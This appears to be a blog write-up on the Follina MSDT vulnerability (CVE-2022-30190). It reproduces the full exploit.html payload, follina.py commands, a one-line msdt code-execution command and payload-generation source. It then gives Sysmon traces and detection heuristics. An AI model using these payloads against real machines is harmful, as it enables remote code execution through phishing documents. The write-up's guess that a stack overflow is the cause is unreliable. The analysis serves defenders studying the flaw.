Vulnerability description: CVE-2022-30190: Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability
Why it matters: ==> Previously, phishing emails with malicious Office attachments still needed the user to enable macros. This vulnerability is a step up: none of that is required. Looks like the cybercrime phishing scene is in for another bloodbath...
CVE: CVE-2022-30190
Component: Microsoft Windows Support Diagnostic Tool (MSDT), Windows
Vulnerability type: code execution
Impact: server takeover
Summary: A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights.
For the root cause, see: https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/
The core summary: a malicious Word document uses the remote template feature to fetch an HTML file from a remote server. The HTML code then uses Microsoft's MS-MSDT URI protocol to execute PowerShell code. And indeed, the exploit.html source shown later confirms exactly that:
<!doctype html>
<html lang="en">
<head>
  <title> Good thing we disabled macros </title>
</head>
<body>
  <p> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor. Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit. Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellentesque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis. Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu egestas scelerisque, vulputate id est. Proin rutrum nec metus convallis ornare. Ut ultricies ante et dictum imperdiet. Ut nisl magna, porttitor nec odio non, dapibus maximus nibh. Integer lorem felis, accumsan a dapibus hendrerit, maximus nec leo. Vestibulum porta, orci sed dignissim porta, sem justo porta odio, quis rutrum tortor arcu quis massa. Aenean eleifend nisi a quam faucibus, quis scelerisque lectus condimentum. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin non dui nec odio finibus molestie. Suspendisse id massa nunc. Sed ultricies et sapien vel fringilla. </p>
  <p> Donec tincidunt ac justo et iaculis. Pellentesque lacinia, neque at consectetur porttitor, leo eros bibendum lorem, eu sollicitudin dolor urna pharetra augue. Pellentesque facilisis orci quis ante tempor, ac varius eros blandit. Nulla vulputate, purus eu consectetur ullamcorper, mauris nulla commodo dolor, in maximus purus mi eget purus. In mauris diam, imperdiet ac dignissim ut, mollis in purus. In congue volutpat tortor eu auctor. Nullam a eros lectus. Aenean porta semper quam ac lacinia. Curabitur interdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna. Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam sit amet condimentum est. Nulla eget blandit elit. Nunc facilisis erat nec ligula ultrices, malesuada mollis ex porta. Phasellus iaculis lorem eu augue tincidunt, in ultrices massa suscipit. Donec gravida sapien ac dui interdum cursus. In finibus eu dolor sit amet porta. Sed ultrices nisl dui, at lacinia lectus porttitor ut. Ut ac viverra risus. Suspendisse lacus nunc, porttitor facilisis mauris ut, ullamcorper gravida dolor. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus sollicitudin, arcu id sagittis facilisis, turpis dolor eleifend massa, in maximus sapien dui et tortor. Quisque varius enim sed enim venenatis tempor. Praesent quis volutpat lorem. Pellentesque ac venenatis lacus, vitae commodo odio. Sed in metus at libero viverra mollis sed vitae nibh. Sed at semper lectus. </p>
  <p> Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus. Morbi convallis fringilla tortor, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas aliquet felis vel nulla auctor, ac tempor mi mattis. Nam accumsan nisi vulputate, vestibulum nisl at, gravida erat. Nam diam metus, tempor id sapien eu, porta luctus felis. Aliquam luctus vitae tortor quis consectetur. In rutrum neque sit amet fermentum rutrum. Sed a velit at metus pretium tincidunt tristique eget nibh. In ultricies, est ut varius pulvinar, magna purus tristique arcu, et laoreet purus elit ac lectus. Ut venenatis tempus magna, non varius augue consectetur ut. Etiam elit risus, ullamcorper cursus nisl at, ultrices aliquet turpis. Maecenas vitae odio non dolor venenatis varius eu ac sem. Phasellus id tortor tellus. Ut vehicula, justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce. </p>
  <script>
    location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\windows\\system32\\calc)/.exe\"";
  </script>
</body>
</html>
==> The core of it is this line: location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\windows\\system32\\calc)/.exe\"";
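As an added example (not code from this post or from follina.py), the following Python checks look at the two artefacts of the chain just described from the defender's side: a .docx whose relationship parts point at content on an external http(s) server, and an HTML page whose script navigates to an ms-msdt: URI. The minimal .docx archive, the two relationship XML parts and the HTML snippet are constructed inline for the test; the part name word/_rels/settings.xml.rels and the attachedTemplate relationship type used for the suspicious sample are assumptions, and plain hyperlink relationships are skipped because ordinary documents are full of them.

```python
"""Static checks for the Follina delivery chain: a .docx that references content on
an external http(s) server, and an HTML page whose script navigates to ms-msdt:.

Added example for this write-up, not code from the post or from follina.py.
The .docx built below is a constructed minimal archive (only the parts the check
reads, not a usable Word file); the relationship part name, the attachedTemplate
type and the HTML snippet are assumptions made for the test.
"""
import io
import re
import zipfile
from typing import List
from xml.etree import ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# An ms-msdt: URI inside a JS string literal, allowing the \" escapes exploit.html puts around /param.
_MSDT_URI_RE = re.compile(r"ms-msdt:(?:\\.|[^\"'\\\n])*", re.IGNORECASE)


def external_targets(docx_bytes: bytes) -> List[str]:
    """List every http(s) relationship marked TargetMode="External" in any .rels part.

    Plain hyperlinks are skipped: normal documents contain them, whereas a template
    or object relationship that points at a web server is how the post's document
    pulls exploit.html.
    """
    found: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if rel.get("TargetMode") != "External" or rtype == "hyperlink":
                    continue
                if target.lower().startswith(("http://", "https://")):
                    found.append(f"{name}: {rtype} -> {target}")
    return found


def msdt_uris_in_scripts(html: str) -> List[str]:
    """Return the ms-msdt: URIs found inside <script> blocks (the post's page sets location.href to one)."""
    uris: List[str] = []
    for script in _SCRIPT_RE.findall(html):
        uris.extend(_MSDT_URI_RE.findall(script))
    return uris


def build_sample_docx(rels_name: str, rels_xml: str) -> bytes:
    """Constructed minimal archive for the test; it is not a usable Word document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr(rels_name, rels_xml)
    return buf.getvalue()


# Constructed relationship parts: a normal document with one hyperlink, and one whose
# template is fetched from the web server the post's follina.py run serves on.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>
</Relationships>"""
SUSPICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://localhost:80/exploit.html" TargetMode="External"/>
</Relationships>"""
# Constructed stand-in for exploit.html: same navigation, /param contents replaced by a placeholder.
SAMPLE_HTML = r'''<!doctype html><html><body><p>Good thing we disabled macros</p>
<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_BrowseForFile=CONSTRUCTED_PLACEHOLDER\"";
</script></body></html>'''

if __name__ == "__main__":
    print(external_targets(build_sample_docx("word/_rels/document.xml.rels", BENIGN_RELS)))
    print(external_targets(build_sample_docx("word/_rels/settings.xml.rels", SUSPICIOUS_RELS)))
    print(msdt_uris_in_scripts(SAMPLE_HTML))
```

Running the file prints an empty list for the benign document, one entry naming the attachedTemplate relationship and its URL for the suspicious one, and the ms-msdt: URI found in the script. The URI regex accepts the \" escapes that exploit.html wraps around the /param block, so the whole argument string is recovered instead of being cut at the first quote, which is what an analyst wants to see when triaging a fetched page.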
Let's reproduce the vulnerability. Payload source:
https://github.com/chvancooten/follina.py
How to run:
C:\Users\bonel\Desktop\follina.py-main>python .\follina.py -t docx -m binary -b calc.exe
Generated 'clickme.docx' in current directory
Generated 'exploit.html' in 'www' directory
Serving payload on http://localhost:80/exploit.html
Then open http://localhost:80/exploit.html in the browser, and the following appears:
Click Open, and at the end a calc.exe process pops up. An attacker would swap calc.exe for a remote-access trojan, you get the idea!
Process tree as seen in Process Explorer:
Of course, there is an even simpler way to reproduce it: run this directly from the command line: msdt ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe"
On my Win10 machine this also ended up popping the window shown above.
Furthermore, if the document is opened in Word, the process call chain is as shown in the figure at https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/
I tried it myself on Win10 64-bit with Office LTSC Professional Plus 2021 and reproduced the vulnerability; here are the captured runtime screenshot and process information:
Process tree:
Note: if you run python .\follina.py -t rtf -m binary -b \windows\system32\calc.exe
i.e. switch to RTF format, it also works. The process tree is the same as above.
If you run: python .\follina.py -t docx -m command -c calc.exe
then the only difference is the payload. Source analysis:
if args.mode == "command":
    # Original PowerShell execution variant
    command = args.command.replace("\"", "\\\"")
    encoded_command = base64.b64encode(bytearray(command, 'utf-16-le')).decode('UTF-8')
    # Powershell life...
    payload = fr'''"ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{encoded_command}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""'''

if args.mode == "binary":
    # John Hammond binary variant
    binary_path = args.binary.replace('\\', '\\\\').rstrip('.exe')
    payload = fr'"ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$({binary_path})/.exe\""'

print("payload:", payload)
But the process tree is still essentially the same.
-----------------------------------------------------------------------------------------------------------------------------
OK, now let's look at what msdt actually is, and then at how to detect attacks that exploit this kind of vulnerability.
Microsoft Windows Support Diagnostic Tool (MSDT), official description:
msdt
Invokes a troubleshooting pack at the command line or as part of an automated script, and enables additional options without user input.
Syntax
msdt </id <name> | /path <name> | /cab <name>> <</parameter> [options] … <parameter> [options]>>
Parameters
Parameter | Description
---|---
/id <packagename> | Specifies which diagnostic package to run. For a list of available packages, see Available Troubleshooting packs.
/path <directory \| .diagpkg file \| .diagcfg file> | Specifies the full path to a diagnostic package. If you specify a directory, the directory must contain a diagnostic package. You cannot use the /path parameter in conjunction with the /id, /dci, or /cab parameters.
/dci <passkey> | Prepopulates the passkey field. This parameter is only used when a support provider has supplied a passkey.
/dt <directory> | Displays the troubleshooting history in the specified directory. Diagnostic results are stored in the user's %LOCALAPPDATA%\Diagnostics or %LOCALAPPDATA%\ElevatedDiagnostics directories.
/af <answerfile> | Specifies an answer file in XML format that contains responses to one or more diagnostic interactions.
/modal <ownerHWND> | Makes the troubleshooting pack modal to a window designated by the parent Console Window Handle (HWND), in decimal. This parameter is typically used by applications that launch a troubleshooting pack. For more information about obtaining Console Window Handles, see How to Obtain a Console Window Handle (HWND).
/moreoptions <true \| false> | Enables (true) or suppresses (false) the final troubleshooting screen that asks if the user wants to explore additional options. This parameter is typically used when the troubleshooting pack is launched by a troubleshooter that isn't part of the operating system.
/param <parameters> | Specifies a set of interaction responses at the command line, similar to an answer file. This parameter isn't typically used within the context of troubleshooting packs created with TSP Designer. For more information about developing custom parameters, see Windows Troubleshooting Platform. ==> Specifies a set of interaction responses on the command line, ... a pile of blah blah ... the key point: developing custom parameters!!!
/advanced | Expands the advanced link on the Welcome page by default when the troubleshooting pack is started.
/custom | Prompts the user to confirm each possible resolution before it is applied.
OK, since these are custom parameters, it's easy to understand why the vulnerability arises; presumably a stack overflow somewhere underneath.
Now let's look at the data captured for the browser-click run above, which ended with calc.exe running. Here is what Sysmon collected:
1. The last step: here is calc.exe,
Process Create:
RuleName: -
UtcTime: 2022-06-02 02:57:11.385
ProcessGuid: {0bf95bee-2707-6298-f204-000000001000}
ProcessId: 7856
Image: C:\Windows\System32\calc.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: Windows Calculator
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: CALC.EXE
CommandLine: "C:\Windows\system32\calc.exe"
CurrentDirectory: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-19d3-6298-031c-090000000000}
LogonId: 0x91C03
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=5DA8C98136D98DFEC4716EDD79C7145F,SHA256=58189CBD4E6DC0C7D8E66B6A6F75652FC9F4AFC7CE0EBA7D67D8C3FEB0D5381F,IMPHASH=8EEAA9499666119D13B3F44ECD77A729
ParentProcessGuid: {0bf95bee-2706-6298-ec04-000000001000}
ParentProcessId: 1252
ParentImage: C:\Windows\System32\sdiagnhost.exe
ParentCommandLine: C:\Windows\System32\sdiagnhost.exe -Embedding
ParentUser: DESKTOP-92JS9SJ\bonel
Its ParentImage is C:\Windows\System32\sdiagnhost.exe, which is the thing that pops up the diagnostic window.
2. Of course, the diagnostic window spawns a bunch of processes, for example csc.exe:
Process Create:
RuleName: -
UtcTime: 2022-06-02 02:57:11.265
ProcessGuid: {0bf95bee-2707-6298-f004-000000001000}
ProcessId: 3924
Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
FileVersion: 4.8.4084.0 built by: NET48REL1
Description: Visual C# Command Line Compiler
Product: Microsoft® .NET Framework
Company: Microsoft Corporation
OriginalFileName: csc.exe
CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\bonel\AppData\Local\Temp\y2qzf0yf.cmdline"
CurrentDirectory: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-19d3-6298-031c-090000000000}
LogonId: 0x91C03
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D
ParentProcessGuid: {0bf95bee-2706-6298-ec04-000000001000}
ParentProcessId: 1252
ParentImage: C:\Windows\System32\sdiagnhost.exe
ParentCommandLine: C:\Windows\System32\sdiagnhost.exe -Embedding
ParentUser: DESKTOP-92JS9SJ\bonel
And here is sdiagnhost.exe's own event:
Process Create:
RuleName: -
UtcTime: 2022-06-02 02:57:10.776
ProcessGuid: {0bf95bee-2706-6298-ec04-000000001000}
ProcessId: 1252
Image: C:\Windows\System32\sdiagnhost.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: Scripted Diagnostics Native Host
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: sdiagnhost.exe
CommandLine: C:\Windows\System32\sdiagnhost.exe -Embedding
CurrentDirectory: C:\Windows\system32\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-19d3-6298-031c-090000000000}
LogonId: 0x91C03
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=6A21B1893DDE94CB87BA56111375888A,SHA256=761815301A00D0B3A7BB4959A5004B623C55009CE701C6E867C96F468DC1323A,IMPHASH=88C840A970A1633DCA61E1CD2D926E21
ParentProcessGuid: {00000000-0000-0000-0000-000000000000}
ParentProcessId: 728
ParentImage: -
ParentCommandLine: -
ParentUser: -
Note: ParentProcessId: 728
C:\Users\bonel>tasklist |findstr 728
svchost.exe 728 Services 0 19,376 K
3. During this time, msdt.exe created some temporary .ps1 files
File created:
RuleName: -
UtcTime: 2022-06-02 02:57:10.685
ProcessGuid: {0bf95bee-2706-6298-eb04-000000001000}
ProcessId: 2412
Image: C:\Windows\system32\msdt.exe
TargetFilename: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\VF_ProgramCompatibilityWizard.ps1
CreationUtcTime: 2022-06-02 02:57:10.685
User: DESKTOP-92JS9SJ\bonel

File created:
RuleName: -
UtcTime: 2022-06-02 02:57:10.685
ProcessGuid: {0bf95bee-2706-6298-eb04-000000001000}
ProcessId: 2412
Image: C:\Windows\system32\msdt.exe
TargetFilename: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\TS_ProgramCompatibilityWizard.ps1
CreationUtcTime: 2022-06-02 02:57:10.685
User: DESKTOP-92JS9SJ\bonel

File created:
RuleName: -
UtcTime: 2022-06-02 02:57:10.685
ProcessGuid: {0bf95bee-2706-6298-eb04-000000001000}
ProcessId: 2412
Image: C:\Windows\system32\msdt.exe
TargetFilename: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\RS_ProgramCompatibilityWizard.ps1
CreationUtcTime: 2022-06-02 02:57:10.685
User: DESKTOP-92JS9SJ\bonel
And a DLL as well...
File created:
RuleName: DLL
UtcTime: 2022-06-02 02:57:10.685
ProcessGuid: {0bf95bee-2706-6298-eb04-000000001000}
ProcessId: 2412
Image: C:\Windows\system32\msdt.exe
TargetFilename: C:\Users\bonel\AppData\Local\Temp\SDIAG_9b730195-a334-4526-b858-efc005d7882d\DiagPackage.dll
CreationUtcTime: 2022-06-02 02:57:10.685
User: DESKTOP-92JS9SJ\bonel
4. If msdt is run from the command line, you can see that its parent process is cmd!
Process Create:
RuleName: -
UtcTime: 2022-06-02 02:57:10.632
ProcessGuid: {0bf95bee-2706-6298-eb04-000000001000}
ProcessId: 2412
Image: C:\Windows\System32\msdt.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: Diagnostics Troubleshooting Wizard
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: msdt.exe
CommandLine: msdt ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe"
CurrentDirectory: C:\Users\bonel\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-19d3-6298-031c-090000000000}
LogonId: 0x91C03
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=992C3F0CC8180F2F51156671E027AE75,SHA256=6859D1B5D1BEAA2985B298F3FCEE67F0AAC747687A9DEC2B4376585E99E9756F,IMPHASH=3A1E8B78C984CDC6E669D871794AD160
ParentProcessGuid: {0bf95bee-1dbf-6298-e901-000000001000}
ParentProcessId: 3792
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\Windows\system32\cmd.exe"
ParentUser: DESKTOP-92JS9SJ\bonel
The process tree for msdt run from cmd looks like this (drawn with 火绒剑 / Huorong Sword):
As you can see, sdiagnhost.exe is spawned by svchost.exe!!!
5. If the diagnostic tool is opened through a browser, msdt.exe's parent process is msedge.exe; of course it could also be Firefox or the like.
Process Create:
RuleName: -
UtcTime: 2022-06-02 03:06:44.756
ProcessGuid: {0bf95bee-2944-6298-0d05-000000001000}
ProcessId: 2076
Image: C:\Windows\System32\msdt.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: Diagnostics Troubleshooting Wizard
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: msdt.exe
CommandLine: "C:\Windows\system32\msdt.exe" ms-msdt:/id系统找不到指定的设备。PCWDiagnostic系统找不到指定的设备。/skip系统找不到指定的设备。force系统找不到指定的设备。/param系统找不到指定的设备。设备不识别此命令。IT_RebrowseForFile=?系统找不到指定的设备。IT_LaunchMethod=ContextMenu系统找不到指定的设备。IT_BrowseForFile=/../../$(calc)/.exe设备不识别此命令。
CurrentDirectory: C:\Windows\system32\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-19d3-6298-031c-090000000000}
LogonId: 0x91C03
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=992C3F0CC8180F2F51156671E027AE75,SHA256=6859D1B5D1BEAA2985B298F3FCEE67F0AAC747687A9DEC2B4376585E99E9756F,IMPHASH=3A1E8B78C984CDC6E669D871794AD160
ParentProcessGuid: {0bf95bee-19f1-6298-a000-000000001000}
ParentProcessId: 7164
ParentImage: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
ParentCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
ParentUser: DESKTOP-92JS9SJ\bonel
OK, that covers data collection and tracing, and the detection approach follows naturally:
1. An msdt.exe process spawned from cmd/msedge/Office processes is suspicious.
2. msdt.exe whose arguments contain /../../xxxx/.exe is carrying a malicious payload. ==> Detecting this directly also works!